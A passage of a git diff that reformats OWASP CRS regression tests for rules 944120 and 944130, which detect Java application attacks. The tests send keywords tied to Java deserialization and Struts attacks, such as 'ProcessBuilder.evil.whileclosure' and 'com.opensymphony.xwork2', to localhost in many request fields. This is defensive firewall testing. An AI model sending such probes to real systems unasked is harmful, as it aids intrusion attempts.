"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 128 desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_id: 129 desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_id: 130 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_id: 131 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - {"test": "ProcessBuilder.evil.whileclosure"} - output: - log_contains: "id \"944120\"" - - test_title: 944120-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + {"test": "ProcessBuilder.evil.whileclosure"} + output: + log_contains: "id \"944120\"" + - test_id: 132 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - {"ProcessBuilder.evil.whileclosure": "test"} - output: - log_contains: "id \"944120\"" - - test_title: 944120-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + {"ProcessBuilder.evil.whileclosure": "test"} + output: + log_contains: "id \"944120\"" 
+ - test_id: 133 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.whileclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-134 + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 134 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.whileclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-135 + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 135 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 
CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.whileclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-136 + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 136 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; 
name="payload" + Content-Type: application/xml - ProcessBuilder.evil.whileclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml index 163bba932..39be47806 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml 
@@ -1,8481 +1,8062 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944130.yaml" description: "Positive tests for rule 944130" +rule_id: 944130 tests: - - test_title: 944130-1 + - test_id: 1 desc: "Argument test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_id: 2 desc: "Argument name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2=test" + output: + log_contains: "id \"944130\"" + - test_id: 3 desc: "Cookie test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=com.opensymphony.xwork2 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.opensymphony.xwork2 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 4 desc: "Cookie name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: com.opensymphony.xwork2=test - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.opensymphony.xwork2=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 5 desc: "Request header test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: com.opensymphony.xwork2 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.opensymphony.xwork2 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 6 desc: "XML attribute value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 7 desc: "XML element value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_id: 8 desc: "Nested XML element value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 
80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_id: 9 desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_id: 10 desc: "Content-Type 
application/json arg value includes keyword com.opensymphony.xwork2"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"test\": \"com.opensymphony.xwork2\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-11
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"com.opensymphony.xwork2\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 11
 desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"com.opensymphony.xwork2\": \"test\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-12
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"com.opensymphony.xwork2\": \"test\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 12
 desc: "Argument test includes keyword com.sun.org.apache"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=com.sun.org.apache"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-13
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=com.sun.org.apache"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 13
 desc: "Argument name includes keyword com.sun.org.apache"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "com.sun.org.apache=test"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-14
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "com.sun.org.apache=test"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 14
 desc: "Cookie test includes keyword com.sun.org.apache"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=com.sun.org.apache
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-15
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=com.sun.org.apache
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 15
 desc: "Cookie name includes keyword com.sun.org.apache"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: com.sun.org.apache=test
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-16
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: com.sun.org.apache=test
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 16
 desc: "Request header test includes keyword com.sun.org.apache"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: com.sun.org.apache
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-17
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
